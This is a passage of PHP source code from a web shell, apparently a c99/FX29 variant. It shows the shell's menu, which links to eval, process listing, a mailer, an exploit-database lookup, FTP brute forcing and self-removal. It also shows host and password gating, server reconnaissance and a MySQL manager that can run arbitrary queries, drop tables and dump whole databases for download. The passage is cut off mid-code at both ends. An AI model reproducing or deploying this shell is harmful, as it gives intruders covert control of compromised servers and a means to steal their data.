src="'.$surl.'act=img&img=';$quicklaunch=array(array($img_tag."home\" alt=\"Home\">",$surl),array($img_tag."back\" alt=\"Back\">","#\" onclick=\"history.back(1)"),array($img_tag."forward\" alt=\"Forward\">","#\" onclick=\"history.go(1)"),array($img_tag."up\" alt=\"Up\">",$surl."act=ls&d=%upd&sort=%sort"),array($img_tag."search\" alt=\"Search\">",$surl."act=search&d=%d"),array($img_tag."buffer\" alt=\"Buffer\">",$surl."act=fsbuff&d=%d"),array($img_tag."help\" alt=\"About\">",$surl."act=about"),array("-",""),array("Security",$surl."act=security&d=%d"),array("Processes",$surl."act=processes&d=%d"),array("MySQL",$surl."act=sql&d=%d"),array("Eval",$surl."act=eval&d=%d"),array("Encoder",$surl."act=encoder&d=%d"),array("Mailer",$surl."act=fxmailer"),array("Toolz",$surl."act=tools&d=%d"),array("milw0rm",milw0rm()),array("Images",$surl."act=img&img=listall"),array("Feedback",$surl."act=feedback"),array("Update",$surl."act=update"),array("Kill Shell",$surl."act=selfremove"));if(!is_windows())$quicklaunch[]=array("<br>FTP Brute",$surl."act=ftpquickbrute&d=%d");$ftypes=array("html"=>array("html","htm","shtml"),"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),"exe"=>array("sh","install","bat","cmd","sys","com"),"ini"=>array("ini","inf","conf"),"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),"sdb"=>array("sdb"),"phpsess"=>array("sess"),"download"=>array("exe","com","sys","pif","src","lnk","zip","rar","gz","tar","pdf"));$exeftypes=array("php -q %f%"=>array("php","php3","php4"),"perl %f%"=>array("pl","cgi"));$regxp_highlight=array(array(basename($_SERVER["PHP_SELF"]),1 ,"<font color=#FF6600>","</font>"),array("\.tgz$",1 ,"<font color=#C082FF>","</font>"),array("\.gz$",1 ,"<font color=#C082FF>","</font>"),array("\.tar$",1 ,"<font color=#C082FF>","</font>"),array("\.zip$",1 ,"<font color=#C082FF>","</font>"),array("\.rar$",1 ,"<font color=#C082FF>","</font>"),array("\.php$",1 ,"<font color=#00FF00>","</font>"),array("\.jpg$",1 ,"<font color=#00FFFF>","</font>"),array("\.jpeg$",1 ,"<font color=#00FFFF>","</font>"),array("\.ico$",1 ,"<font color=#00FFFF>","</font>"),array("\.gif$",1 ,"<font color=#00FFFF>","</font>"),array("\.png$",1 ,"<font color=#00FFFF>","</font>"),array("\.htm$",1 ,"<font color=#00CCFF>","</font>"),array("\.html$",1 ,"<font color=#00CCFF>","</font>"),array("\.txt$",1 ,"<font color=#C0C0C0>","</font>"),array("\.pdf$",1 ,"<font color=#FF99CC>","</font>"));$highlight_bg="#E0E0E0";$highlight_comment="#FF6600";$highlight_default="#000080";$highlight_html="#1300FF";$highlight_keyword="#007700";$highlight_string="#FF0000";@ini_set("highlight.bg",$highlight_bg);@ini_set("highlight.comment",$highlight_comment);@ini_set("highlight.default",$highlight_default);@ini_set("highlight.html",$highlight_html);@ini_set("highlight.keyword",$highlight_keyword);@ini_set("highlight.string",$highlight_string);foreach($auth["hostallow"] as $k=>$v){$tmp[]=str_replace("\\*",".*",preg_quote($v));}$s="!^(".implode("|",$tmp).")$!i";if(!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))){exit("<a href=\"$sh_mainurl\">".sh_name()."</a>ACCESS DENIED! Your host (".getenv("REMOTE_ADDR").") not allowed!");}if(!empty($auth["login"])){if(empty($auth["md5pass"]))$auth["md5pass"]=md5($auth["pass"]);if(($_SERVER["PHP_AUTH_USER"]!=$auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"])!=$auth["md5pass"])){header("WWW-Authenticate: Basic realm=\"".sh_name().": Restricted Area\"");header("HTTP/1.0 401 Unauthorized");die($auth["denied"]);}}if(!isset($act))$act="";if($act=="img"){@ob_clean();$images=imagez();$imgequals=array("ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),"ext_cpp"=>array("ext_c"),"ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),"ext_html"=>array("ext_html","ext_htm"),"ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),"ext_lnk"=>array("ext_lnk","ext_url"),"ext_ini"=>array("ext_ini","ext_css","ext_inf","ext_conf"),"ext_doc"=>array("ext_doc","ext_dot","ext_xls","ext_pdf"),"ext_js"=>array("ext_js","ext_vbs"),"ext_cmd"=>array("ext_cmd","ext_bat","ext_pif","ext_com"),"ext_wri"=>array("ext_wri","ext_rtf"),"ext_txt"=>array("ext_txt","ext_lng"),"ext_swf"=>array("ext_swf","ext_fla"),"ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid","ext_wav"),"ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so"));if($img=="listall"){foreach($imgequals as $a=>$b){foreach($b as $d){if(($a!=$d) && (!empty($images[$d])))echo ("Warning! Remove \$images[".$d."]<br>");}}natsort($images);$k=array_keys($images);echo "<body style=\"color: #00FF00\" bgcolor=black>";foreach($k as $u){echo "<img src=\"".$surl."act=img&img=".$u."\"> $u ";}exit;}header("Content-type: image/gif");header("Cache-control: public");header("Expires: ".date("r",mktime(0 ,0 ,0 ,1 ,1 ,2030 )));header("Cache-control: max-age=".(60 *60 *24 *7 ));header("Last-Modified: ".date("r",filemtime(__FILE__)));foreach($imgequals as $k=>$v){if(in_array($img,$v)){$img=$k;break;}}if(empty($images[$img])){$img="small_unk";}echo base64_decode($images[$img]);exit;}else {$lastdir=realpath(".");chdir("./");$sess_data=@unserialize($_COOKIE[$sess_cookie]);if(!is_array($sess_data)){$sess_data=array();}if(!is_array(@$sess_data["copy"])){$sess_data["copy"]=array();}if(!is_array(@$sess_data["cut"])){$sess_data["cut"]=array();}fx29_buff_prepare();foreach(array("sort","sql_sort") as $v){if(!empty($_GET[$v])){$$v=$_GET[$v];}if(!empty($_POST[$v])){$$v=$_POST[$v];}}if($sort_save){if(!empty($sort)){setcookie("sort",$sort);}if(!empty($sql_sort)){setcookie("sql_sort",$sql_sort);}}if(!isset($sort)){$sort=$sort_default;}$sort=htmlspecialchars($sort);$sort[1 ]=strtolower($sort[1 ]);if($act=="gofile"){if(is_dir($f)){$d=$f;$act="ls";}else {$d=dirname($f);$f=basename($f);$act="f";}}ob_start();ob_implicit_flush(0 );header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");header("Cache-Control: no-store, no-cache, must-revalidate");header("Cache-Control: post-check=0, pre-check=0",FALSE);header("Pragma: no-cache");$tmp_dir=realpath($tmp_dir);$tmp_dir=str_replace("\\",DIRECTORY_SEPARATOR,$tmp_dir);if(substr($tmp_dir,-1 )!=DIRECTORY_SEPARATOR)$tmp_dir.=DIRECTORY_SEPARATOR;if(!is_array(@$actbox))$actbox=array();$dspact=$act=htmlspecialchars($act);$disp_fullpath=$ls_arr=$notls=null;$ud=@urlencode($d);if(empty($d))$d=realpath(".");elseif(realpath($d))$d=realpath($d);$d=str_replace("\\",DIRECTORY_SEPARATOR,$d);if(substr($d,-1 )!=DIRECTORY_SEPARATOR)$d.=DIRECTORY_SEPARATOR;$d=str_replace("\\\\","\\",$d);$dispd=htmlspecialchars($d);if(safemode()){$hsafemode='<font class="on"><b>SAFE MODE IS ON</b></font>';$safemodeexecdir=@ini_get("safe_mode_exec_dir");}else {$hsafemode='<font class="off"><b>SAFE MODE IS OFF</b></font>';}$v=@ini_get("open_basedir");if(strtolower($v)=="on"){$hopenbasedir='<font class="on">'.$v.'</font>';}else {$hopenbasedir='<font class="off">OFF (Not Secure)</font>';}$wd=(is_writable($d))?'<font class="on">[W]</font>':'<font class="off">[R]</font>';echo html_style(); ?>
<!-- Main Menu -->
<div id="main">

	<div class="bartitle"><? echo html_header() ?></div>

	<table id="pagebar">

		<!-- Server Info -->
		<tr><td colspan="2">
		<div class="fleft"><? echo $hsafemode; ?></div>
		<div class="fright">
			IP Address: <a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=<? echo @gethostbyname($_SERVER["HTTP_HOST"]); ?>"><? echo @gethostbyname($_SERVER["HTTP_HOST"]); ?></a>
			You: <a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=<? echo $_SERVER["REMOTE_ADDR"]; ?>"><? echo $_SERVER["REMOTE_ADDR"]; ?></a>
		</div>
		</td></tr>

		<tr><td width="50%">
		<table class="info">
<? srv_info("Software",srv_software($surl));srv_info("Uname",php_uname());srv_info("User",(is_windows())?get_current_user()." (uid=".getmyuid()." gid=".getmygid().")":fx29exec("id")); ?>
		</table>
		</td>
		<td width="50%">
		<table class="info">
<? if(is_windows()){srv_info("Drives",disp_drives($d,$surl));}srv_info("Freespace",disp_freespace($d)); ?>
		</table>
		</td></tr>

		<tr><td colspan="2">
<? echo "\t\t\t".get_status();echo "<br>\n";echo (isset($safemodeexecdir))?"\n\t\t\tSafemodeExecDir: ".$safemodeexecdir."<br>":"";echo (showdisfunc())?"\t\t\tDisFunc: ".showdisfunc():"";echo "\n"; ?>
		</td></tr>
		<!-- End of Server Info -->

		<!-- Quicklaunch -->
		<tr><td colspan="2" class="quicklaunch">
<? foreach($quicklaunch as $item){if($item[0 ]=="-"){echo "\t\t</td></tr>\n";echo "\t\t<tr><td colspan=\"2\" class=\"quicklaunch\">\n";}else {$item[1 ]=str_replace("%d",urlencode($d),$item[1 ]);$item[1 ]=str_replace("%sort",$sort,$item[1 ]);$v=realpath($d."..");if(empty($v)){$a=explode(DIRECTORY_SEPARATOR,$d);unset($a[count($a)-2 ]);$v=join(DIRECTORY_SEPARATOR,$a);}$item[1 ]=str_replace("%upd",urlencode($v),$item[1 ]);echo "\t\t\t<a href=\"".$item[1 ]."\">".$item[0 ]."</a>\n";}} ?>
		</td></tr>
		<!-- End of Quicklaunch -->

		<!-- Directory Info -->
		<tr><td colspan="2">
		<div class="fleft">
<? $pd=$e=explode(DIRECTORY_SEPARATOR,substr($d,0 ,-1 ));$i=0 ;foreach($pd as $b){$t="";$j=0 ;foreach($e as $r){$t.=$r.DIRECTORY_SEPARATOR;if($j==$i){break;}$j++;}echo "\t\t\t<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\">".htmlspecialchars($b).DIRECTORY_SEPARATOR."</a>\n";$i++;}echo "\t\t\t";echo (is_writable($d))?"<b>".view_perms_color($d)."</b>":"<b>".view_perms_color($d)."</b>";echo "\n"; ?>
		</div>
		<div class="fright">
		<form name="f_dir" method="post">
			<input type="hidden" name="act" value="ls">
			Directory: <input type="text" name="d" size="60" value="<? echo $dispd; ?>"> <input type=submit value="Go">
		</form>
		</div>
		</td></tr>
		<!-- End of Directory Info -->

	</table>

</div>
<!-- End of Main Menu -->

<!-- Main Info -->
<div id="maininfo">

<? if($act==""){$act=$dspact="ls";}if($act=="sql"){$sql_surl=$surl."act=sql";if(!isset($sql_login)){$sql_login="";}if(!isset($sql_passwd)){$sql_passwd="";}if(!isset($sql_server)){$sql_server="";}if(!isset($sql_port)){$sql_port="";}if(!isset($sql_tbl)){$sql_tbl="";}if(!isset($sql_act)){$sql_act="";}if(!isset($sql_tbl_act)){$sql_tbl_act="";}if(!isset($sql_order)){$sql_order="";}if(!isset($sql_act)){$sql_act="";}if(!isset($sql_getfile)){$sql_getfile="";}if(@$sql_login){$sql_surl.="&sql_login=".htmlspecialchars($sql_login);}if(@$sql_passwd){$sql_surl.="&sql_passwd=".htmlspecialchars($sql_passwd);}if(@$sql_server){$sql_surl.="&sql_server=".htmlspecialchars($sql_server);}if(@$sql_port){$sql_surl.="&sql_port=".htmlspecialchars($sql_port);}if(@$sql_db){$sql_surl.="&sql_db=".htmlspecialchars($sql_db);}$sql_surl.="&"; ?>
<!-- SQL Manager -->
<? bar_header(".: SQL Manager (Under Construction) :."); ?>
<div class="barheader"><? if(@$sql_server){$sql_sock=@mysql_connect($sql_server.":".$sql_port,$sql_login,$sql_passwd);$err=mysql_smarterror($sql_sock);@mysql_select_db($sql_db,$sql_sock);if(@$sql_query and $submit){$sql_query_result=mysql_query($sql_query,$sql_sock);$sql_query_error=mysql_smarterror($sql_sock);}}else {$sql_sock=FALSE;}if(!$sql_sock){if(!@$sql_server){echo "No Connection!";}else {disp_error("ERROR: ".$err);}}else {$sqlquicklaunch=array();$sqlquicklaunch[]=array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");$sqlquicklaunch[]=array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));$sqlquicklaunch[]=array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");$sqlquicklaunch[]=array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");$sqlquicklaunch[]=array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");$sqlquicklaunch[]=array("Logout",$surl."act=sql");echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";if(count($sqlquicklaunch)>0 ){foreach($sqlquicklaunch as $item){echo "[ <a href=\"".$item[1 ]."\">".$item[0 ]."</a> ] ";}}} ?>
</div>

<table>
	<tr>
<? if(!$sql_sock){ ?>
	<td>
	<form name="f_sql" action="<? echo $surl; ?>" method="post">
		<input type="hidden" name="act" value="sql">
		<table class="explorer">
			<tr>
			<th>Username<br><input type="text" name="sql_login" value="root"></th>
			<th>Password<br><input type="password" name="sql_passwd" value=""></th>
			<th>Database<br><input type="text" name="sql_db" value=""></th>
			<th>Host<br><input type="text" name="sql_server" value="localhost"></th>
			<th>Port<br><input type="text" name="sql_port" value="3306" size="3"></th>
			</tr>
			<tr><th colspan="5"><input type="submit" value="Connect"></th></tr>
		</table>
	</form>
<? }else { ?>
	<td>
	<center>
	<a href="<? echo $sql_surl; ?>"><b>HOME</b></a>
	<hr size="1" noshade>
<? $result=mysql_list_dbs($sql_sock);if(!$result){echo mysql_smarterror();}else { ?>
	Database
	<form action="<? echo $surl ?>">
		<input type="hidden" name="act" value="sql">
		<input type="hidden" name="sql_login" value="<? echo htmlspecialchars($sql_login); ?>">
		<input type="hidden" name="sql_passwd" value="<? echo htmlspecialchars($sql_passwd); ?>">
		<input type="hidden" name="sql_server" value="<? echo htmlspecialchars($sql_server); ?>">
		<input type="hidden" name="sql_port" value="<? echo htmlspecialchars($sql_port); ?>">
		<select name="sql_db" onchange="this.form.submit()">
<? $c=0 ;$dbs="";while($row=mysql_fetch_row($result)){$dbs.="\t\t<option value=\"".$row[0 ]."\"";if(@$sql_db==$row[0 ]){$dbs.=" selected";}$dbs.=">".$row[0 ]."</option>\n";$c++;}echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";echo $dbs;} ?>
		</select>
	</form>
	</center>
	<hr size="1" noshade>
<? if(isset($sql_db)){$result=mysql_list_tables($sql_db);if(!$result){echo mysql_smarterror($sql_sock);}else {echo "\t-=[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]=-<br><br>\n";$c=0 ;while($row=mysql_fetch_array($result)){$count=mysql_query("SELECT COUNT(*) FROM ".$row[0 ]);$count_row=mysql_fetch_array($count);echo "\t<b>+ <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0 ])."\">".htmlspecialchars($row[0 ])."</a></b> (".$count_row[0 ].")</br></b>\n";mysql_free_result($count);$c++;}if(!$c){echo "No tables found in database";}}} ?>

	</td>
	<td>
<? $diplay=TRUE;if(@$sql_db){if(!is_numeric($c)){$c=0 ;}if($c==0 ){$c="no";}echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";if(count(@$dbquicklaunch)>0 ){foreach($dbsqlquicklaunch as $item){echo "[ <a href=\"".$item[1 ]."\">".$item[0 ]."</a> ] ";}}echo "</b></center>\n";$acts=array("","dump");if($sql_act=="tbldrop"){$sql_query="DROP TABLE";foreach($boxtbl as $v){$sql_query.="\n`".$v."` ,";}$sql_query=substr($sql_query,0 ,-1 ).";";$sql_act="query";}elseif($sql_act=="tblempty"){$sql_query="";foreach($boxtbl as $v){$sql_query.="DELETE FROM `".$v."` \n";}$sql_act="query";}elseif($sql_act=="tbldump"){if(count($boxtbl)>0 ){$dmptbls=$boxtbl;}elseif($thistbl){$dmptbls=array($sql_tbl);}$sql_act="dump";}elseif($sql_act=="tblcheck"){$sql_query="CHECK TABLE";foreach($boxtbl as $v){$sql_query.="\n`".$v."` ,";}$sql_query=substr($sql_query,0 ,-1 ).";";$sql_act="query";}elseif($sql_act=="tbloptimize"){$sql_query="OPTIMIZE TABLE";foreach($boxtbl as $v){$sql_query.="\n`".$v."` ,";}$sql_query=substr($sql_query,0 ,-1 ).";";$sql_act="query";}elseif($sql_act=="tblrepair"){$sql_query="REPAIR TABLE";foreach($boxtbl as $v){$sql_query.="\n`".$v."` ,";}$sql_query=substr($sql_query,0 ,-1 ).";";$sql_act="query";}elseif($sql_act=="tblanalyze"){$sql_query="ANALYZE TABLE";foreach($boxtbl as $v){$sql_query.="\n`".$v."` ,";}$sql_query=substr($sql_query,0 ,-1 ).";";$sql_act="query";}elseif($sql_act=="deleterow"){$sql_query="";if(!empty($boxrow_all)){$sql_query="DELETE * FROM `".$sql_tbl."`;";}else {foreach($boxrow as $v){$sql_query.="DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";}$sql_query=substr($sql_query,0 ,-1 );}$sql_act="query";}elseif($sql_tbl_act=="insert"){if($sql_tbl_insert_radio==1 ){$keys="";$akeys=array_keys($sql_tbl_insert);foreach($akeys as $v){$keys.="`".addslashes($v)."`, ";}if(!empty($keys)){$keys=substr($keys,0 ,strlen($keys)-2 );}$values="";$i=0 ;foreach(array_values($sql_tbl_insert) as $v){if($funct=$sql_tbl_insert_functs[$akeys[$i]]){$values.=$funct." (";}$values.="'".addslashes($v)."'";if($funct){$values.=")";}$values.=", ";$i++;}if(!empty($values)){$values=substr($values,0 ,strlen($values)-2 );}$sql_query="INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";$sql_act="query";$sql_tbl_act="browse";}elseif($sql_tbl_insert_radio==2 ){$set=mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);$sql_query="UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";$result=mysql_query($sql_query) or print (mysql_smarterror());$result=mysql_fetch_array($result,MYSQL_ASSOC);$sql_act="query";$sql_tbl_act="browse";}}if($sql_act=="query"){echo "<hr size=\"1\" noshade>";if(($submit) and (!$sql_query_result) and ($sql_confirm)){if(!$sql_query_error){$sql_query_error="Query was empty";}echo "<b>Error:</b> <br>".$sql_query_error."<br>";}if($sql_query_result or (!$sql_confirm)){$sql_act=$sql_goto;}if((!$submit) or ($sql_act)){echo "<table><tr><td><form action=\"".$sql_surl."\" method=\"post\"><b>";if(($sql_query) and (!$submit)){echo "Do you really want to:";}else {echo "SQL-Query :";}echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}}if(in_array($sql_act,$acts)){ ?>
	<table>
		<tr>
		<td>
		<b>Create new table:</b>
		<form action="<? echo $surl; ?>">
			<input type="hidden" name="act" value="sql">
			<input type="hidden" name="sql_act" value="newtbl">
			<input type="hidden" name="sql_db" value="<? echo htmlspecialchars($sql_db); ?>">
			<input type="hidden" name="sql_login" value="<? echo htmlspecialchars($sql_login); ?>">
			<input type="hidden" name="sql_passwd" value="<? echo htmlspecialchars($sql_passwd); ?>">
			<input type="hidden" name="sql_server" value="<? echo htmlspecialchars($sql_server); ?>">
			<input type="hidden" name="sql_port" value="<? echo htmlspecialchars($sql_port); ?>">
			<input type="text" name="sql_newtbl" size="20">
			Fields: <input type="text" name="sql_field" size="3">
			<input type="submit" value="Create">
		</form>
		</td>
		<td><b>Dump DB:</b>
		<form action="<? echo $surl; ?>">
			<input type="hidden" name="act" value="sql">
			<input type="hidden" name="sql_act" value="dump">
			<input type="hidden" name="sql_db" value="<? echo htmlspecialchars($sql_db); ?>">
			<input type="hidden" name="sql_login" value="<? echo htmlspecialchars($sql_login); ?>">
			<input type="hidden" name="sql_passwd" value="<? echo htmlspecialchars($sql_passwd); ?>">
			<input type="hidden" name="sql_server" value="<? echo htmlspecialchars($sql_server); ?>">
			<input type="hidden" name="sql_port" value="<? echo htmlspecialchars($sql_port); ?>">
			<input type="text" name="dump_file" size="30" value="<? echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">
			<input type="submit" name="submit" value="Dump">
		</form>
		</td>
		</tr>
	</table>
<? if(!empty($sql_act)){echo "<hr size=\"1\" noshade>";}if($sql_act=="newtbl"){echo "<b>";if((mysql_create_db($sql_newdb)) and (!empty($sql_newdb))){echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}}elseif($sql_act=="dump"){if(empty($submit)){$diplay=FALSE;echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";$v=join(";",$dmptbls);echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5 )."\"><br><br>";if($dump_file){$tmp=$dump_file;}else {$tmp=htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp)%30 )."\"><br><br>";echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";echo "</form>";}else {$diplay=TRUE;$set=array();$set["sock"]=$sql_sock;$set["db"]=$sql_db;$dump_out="download";$set["print"]=0 ;$set["nl2br"]=0 ;$set[""]=0 ;$set["file"]=$dump_file;$set["add_drop"]=TRUE;$set["onlytabs"]=array();if(!empty($dmptbls)){$set["onlytabs"]=explode(";",$dmptbls);}$ret=mysql_dump($set);if($sql_dump_download){@ob_clean();header("Content-type: application/octet-stream");header("Content-length: ".strlen($ret));header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");echo $ret;exit;}elseif($sql_dump_savetofile){$fp=fopen($sql_dump_file,"w");if(!$fp){echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}else {fwrite($fp,$ret);fclose($fp);echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";}}else {echo "<b>Dump: nothing to do!</b>";}}}if($diplay){if(!empty($sql_tbl)){if(empty($sql_tbl_act)){$sql_tbl_act="browse";}$count=mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");$count_row=mysql_fetch_array($count);mysql_free_result($count);$tbl_struct_result=mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");$tbl_struct_fields=array();while($row=mysql_fetch_assoc($tbl_struct_result)){$tbl_struct_fields[]=$row;}if(@$sql_ls>@$sql_le){$sql_le=$sql_ls+$perpage;}if(empty($sql_tbl_page)){$sql_tbl_page=0 ;}if(empty($sql_tbl_ls)){$sql_tbl_ls=0 ;}if(empty($sql_tbl_le)){$sql_tbl_le=30 ;}$perpage=$sql_tbl_le-$sql_tbl_ls;if(!is_numeric($perpage)){$perpage=10 ;}$numpages=$count_row[0 ]/$perpage;$e=explode(" ",$sql_order);if(count($e)==2 ){if($e[0 ]=="d"){$asc_desc="DESC";}else {$asc_desc="ASC";}$v="ORDER BY `".$e[1 ]."` ".$asc_desc." ";}else {$v="";}$query="SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";$result=mysql_query($query) or print (mysql_smarterror());echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0 ]." rows)</b></center>";echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a> &nbsp; ";echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a> &nbsp; ";echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a> &nbsp; ";echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a> &nbsp; ";if($sql_tbl_act=="structure"){echo "<b>Under construction!</b>";}if($sql_tbl_act=="insert"){if(!is_array($sql_tbl_insert)){$sql_tbl_insert=array();}if(!empty($sql_tbl_insert_radio)){echo "<b>Under construction!</b>";}else {echo "<br><br><b>Inserting row into table:</b><br>";if(!empty($sql_tbl_insert_q)){$sql_query="SELECT * FROM `".$sql_tbl."`";$sql_query.=" WHERE".$sql_tbl_insert_q;$sql_query.=" LIMIT 1;";$result=mysql_query($sql_query,$sql_sock) or print ("<br><br>".mysql_smarterror());$values=mysql_fetch_assoc($result);mysql_free_result($result);}else {$values=array();}echo "<form method=\"post\"><table width=\"1%\"><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";foreach($tbl_struct_fields as $field){$name=$field["Field"];if(empty($sql_tbl_insert_q)){$v="";}echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";$i++;}echo "</table><br>";echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\"";if(empty($sql_tbl_insert_q)){echo " checked";}echo "><b>Insert as new row</b>";if(!empty($sql_tbl_insert_q)){echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>";echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}echo "<br><br><input type=\"submit\" 